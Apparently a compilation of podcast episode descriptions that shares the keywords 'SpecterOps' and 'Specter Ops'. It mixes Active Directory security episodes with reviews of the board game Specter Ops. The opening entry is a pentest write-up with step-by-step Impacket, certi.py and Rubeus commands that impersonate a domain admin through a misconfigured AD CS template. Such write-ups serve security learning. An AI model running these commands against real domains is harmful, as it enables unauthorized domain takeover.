Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows: Grab Certi Grab Certify Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed: msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands: sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do: rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER And that's it! Do a dir FQDN.TO.DOMAIN.CONTROLLERC$ and enjoy your new super powers!

We love playing games in-person! But sometimes you want to scratch that board-gaming itch for a few minutes in the middle of the workweek. Or during a "break." Or, well, all the damn time. Playing asynchronously on Board Game Arena lets you do just that...a lot. Just don't tell our bosses. Our BGA play pals Emerson Matsuuchi (designer of the Century series, Specter Ops, Reef, and the upcoming Foundations of Rome) and Jess Yi (frequent Going Analog contributor) join Christina and Shoe to gab about Board Game Arena vs. Tabletop Simulator, which games work best on the platform, and whether we can learn how to play (and enjoy) an entire game online without ever reading the rules. Our topics this episode: Jess (contributor): Board Game Arena vs. Tabletop Simulator Christina (host): Which games are better on Board Game Arena, and which are worse? Emerson (guest): Our experiences playing "blind" on Board Game Arena

Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

SpecterOps researchers Lee Christensen and Will Schroeder discuss their work, to be presented at Black Hat, on how AD “misconfiguration debt” lays out a dizzying array of attack paths such as the one in the PetitPotam exploit for which Microsoft  rushed out a fix.

In this episode, Chris Hadnagy and Ryan MacDougall are joined by Jason Frank.  Jason has an extensive background in helping both government and Fortune 100 organizations, and has served a course instructor for the Black Hat security conference. Jason is now currently the COO at SpecterOps, where he is accountable for execution of the company. He oversees the Adversary Simulation and Detection delivery capabilities, where he helps clients to understand, detect, and respond to adversaries. May 17, 2021   00:00 – Intro  Social-Engineer.com  Social-Engineer.org  InnocentLivesFoundation.org  Human Hacking Book  Vishing as a Service (VaaS)  Phishing as a Service (PHaaS)  HumanHackingBook.com  Slack Channel  @HumanHacker on Twitter  CLUTCH  03:05 – Podcast Guest Jason Frank Intro   03:22 – Jason at BlackHat  03:30 - SpecterOps  04:34 – How Jason got to where he is  08:50 – Curiousity and motivation born from failing at a CTF  09:50 – Adversary Simulation – why is Jason using this phrase?  12:32 – Where are we in the current security culture?  16:11 – How to get attention of stakeholders, what concepts do you put in play?  18:03 – Reactive vs. Proactive  21:56 – How can corporations prepare for and mitigate attacks?  23:39 – What are the business repercussions of not letting machines talk to each other, and only the server?  25:45 – What are the more recent attacks you’ve seen coming up that people should be looking for?  28:14 – Knowledge bombs – terminology that people can look up to recognize “low hanging fruit” they may be missing – Bloodhound  30:00 – Cycles where certain things can be exploited such as ActiveDirectory  30:50 – What other things do companies need to be watching for  32:14  – PowerShell  33:44 – What are some action steps that corporations should start taking right now?  34:51 – Colleagues Jason respects most in the industry  Andrew Morris founder of GreyNoise  Dane Stuckey from Palantir  Jason Hill from DHS CISA  Bryan Beyer and Keith McCammon from Red Canary  36:50 – Jason's Book Recommendations  Creativity Inc.  Principles: Life and Work  Get A Grip  38:31 – Wrap-Up  @jasonjfrank on Twitter  Jason J Frank on LinkedIn  @joemontmania on Twitter (Ryan MacDougall)  @HumanHacker on Twitter (Chris Hadnagy)  @InnocentOrg on Twitter (Innocent Lives Foundation) 

Today we talk about another video game IP that’s found its way into the table top world, an awesome hidden movement game, and we share our tips and tricks for being the best board game teacher you can be.

Dylan and Bill explore the unseen corners of the hidden movement game, Specter Ops.

Our latest episode kept having the audio cut in and out.... It was unusable. So you get our unreleased pilot instead! We recorded this a long time ago, so I have no idea what's in the episode... It's a surprise! It's really a win-win situation when you think about it... You win twice! p.s. Jake is not in this episode, so I guess you lose as well.

Emerson Matsuuchi has had some hits with Century: Spice Road, Crossfire and Specter Ops. But what about an abstract game about underwater coral placement? Join the MFGCast as we talk about Reef by Plan B Games. http://mfgcast.com/wp-content/uploads/2018/09/Episode_202_Final.mp3

Emerson Matsuuchi, designer of Specter Ops, goes into all the ins and outs of putting together a hidden movement game. There are very few hidden movement games out there right now which means there’s still a ton to be explored. Emerson discusses the challenges he faced and his insights on the topic. The post How to Make a Great Hidden Movement Game with Emerson Matsuuchi appeared first on Board Game Design Lab.

In this episode, Brandon and Chris got some bonus game time in over the Thanksgiving, which in no way makes up for the two day late release... but we talk about Samurai Spirit, Guild of Dungeoneering, Dishonored 2, Slamwich, Linko! and our games of the week, too. Samurai Spirit - 02:20 Guild of Dungeoneering - 06:13 Star Wars: Guild of Heroes has ships. - 09:39 Brandon's GotW: Specter Ops - 14:43 Foam Core Construction - 27:24 Further Dishonored 2 - 29:00 Slamwich and Junk Art - 33:31 Linko! - 39:42 Chris' GotW: The Castles of Burgundy card game - 42:49 Closing and Contact Info - 65:48

This episode the Dukes ...  ... Discuss recent plays of Space Alert, Via Nebula Box of Rocks, Paris Connection and they play Box of Rocks live on the podcast (3:42); ... Discuss new info about the Scythe expansion straight from Jaime on the latest Dukes' Live Q&A, the new dice and card collectible game from Fantasy Flight Games Star Wars: Destiny, and a new Kickstarter for a real time mech fighting game Armored Core (18:46); ... Review Stonemaier Games' Scythe (29:59);  ... Look back at their review of Specter Ops in their Dukes' Double-Take (1:20:54); and ... Discuss some of their love-hate relationships with games (1:28:45).   Click here to answer the Dukes' survey for a chance to win a $50 gift card to Coolstuffinc.com! Deadline EXTENDED to Midnight Mountain time on August 12, 2016.   Please be sure to support the Dukes on their Patreon campaign page! Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube ChannelSubscribe on iTunes   Visit our sponsor Meeple Realty.    

Today the Dukes...  ... Discuss recent plays including Baseball Highlights 2045, Viceroy, Mysterium, Fury of Dracula (2nd Ed.), Penny Press, Bohnanza and Arcadia Quest (04:08); ... Talk the latest board game news including the Fantasy Flight news from GenCon about Warhammer Quest: The Adventure Card Game and Runebound (3rd Ed.), F2Z acquiring PLaid Hat Games, Tabletop Season 4 announced, and the Kickstarter for Laboratory's 100 Swords (22:25);  ... Review Plaid Hat Games' and Nazca Games' Specter Ops (35:56); and ... Discuss the different types of board game expansions (1:05:38).   Please be sure to support the Dukes on their Patreon campaign page! Don't forget to give us your hearts on Board Game Links! Twitter: @dukesofdiceFacebook: /dukesofdiceDukes of Dice YouTube Channel  

Today the Dukes...  ... Discuss recent plays including Specter Ops, Jaipur, New Salem, Dead Drop, Evolution: Flight and Marco Polo (1:52); ... Talk the latest board game news, including the Attack on Titan game from Cryptozoic, the new expansion for the Sentinels of the Multiverse App and the Kickstarter for JurassAttack! from Green Couch Games. (27:24);  ... Review Spae Cowboys' and Asmodee's Elysium (Rules overview - 33:16; Review - 36:33); and ... Discuss the recent winners of the Spiel Des Jahres (1:02:13). Please be sure to support the Dukes on their Patreon campaign page! Don't forget to give us your hearts on Board Game Links! Twitter: @dukesofdiceFacebook: /dukesofdiceDukes of Dice YouTube Channel  

Too many new games! Questions (plus) Answers! Engine building games broken down! SHOW NOTES: •••What Have We've Been Playing? (00:01:40)►►► Elysium, Voyages of Marco Polo, Specter Ops, Cthulhu Realms, Flip City, Dungeon of Fortune, Bottlecap Vikings •••Games of Interest (01:09:55)►►► Legends of Andor: Chada & Thorn, The Loser's Club, Unnamed Castles of Burgundy Sequel, Council of Four, Rattle Battle Grab the Loot, Dice City, Shadowrift 2nd Edition, Legacy Time Surge, Shadowrun Crossfire High Caliber Ops, Villages of Valeria, Minerva, Shakespeare, Apollo XIII, Octo Dice •••Q&A (01:40:02)►►► How often do we play games? Do we ever play "mean" games? Do we miss playing with more than 2? Am I going to design my own game? Would I take a prototype to a publisher or Kickstarter? How does the boardgame industry compare to the videogame industry? How did you relocate from the US to Malta? More questions? Send your fragen to questions@rahdo.com! •••Top 10 Revisited (02:16:35)►►► Engine building games! Original top10 video: https://www.youtube.com/watch?v=KAKtwJa9J4s •••Help Rahdo run @ https://patreon.com/rahdo •••Send your questions to questions@rahdo.com

In our thirtieth episode, Quinten and Aaron are joined by Colby Dauch and Isaac Vega of Plaid Hat Games and Emerson Matsuuchi of Nazca Games. We all talk about the games we have been playing lately, including the upcoming Ashes from Plaid Hat Games. We don't do a formal review this episode, but interview Colby, Emerson, & Isaac, asking them about their publishing background, their creation of Specter Ops and Ashes, and we had a ton of listener questions. Then we quizzed them on their knowledge of Canada in our trivia game, Know Your Neighbour to the North. This episode is sponsored by Tasty Minstrel Games & Secret Base Games

In our twenty-ninth episode, we talk about the games we have been playing lately. We also have another Dawn of the FunDead segment, with Monstrous from Secret Base Games. We also review the hidden movement game Specter Ops, and we have the second session of Boards Alive Plays: Dungeons & Dragons 5th Edition.  This episode is sponsored by Tasty Minstrel Games & Grok Gaming Mats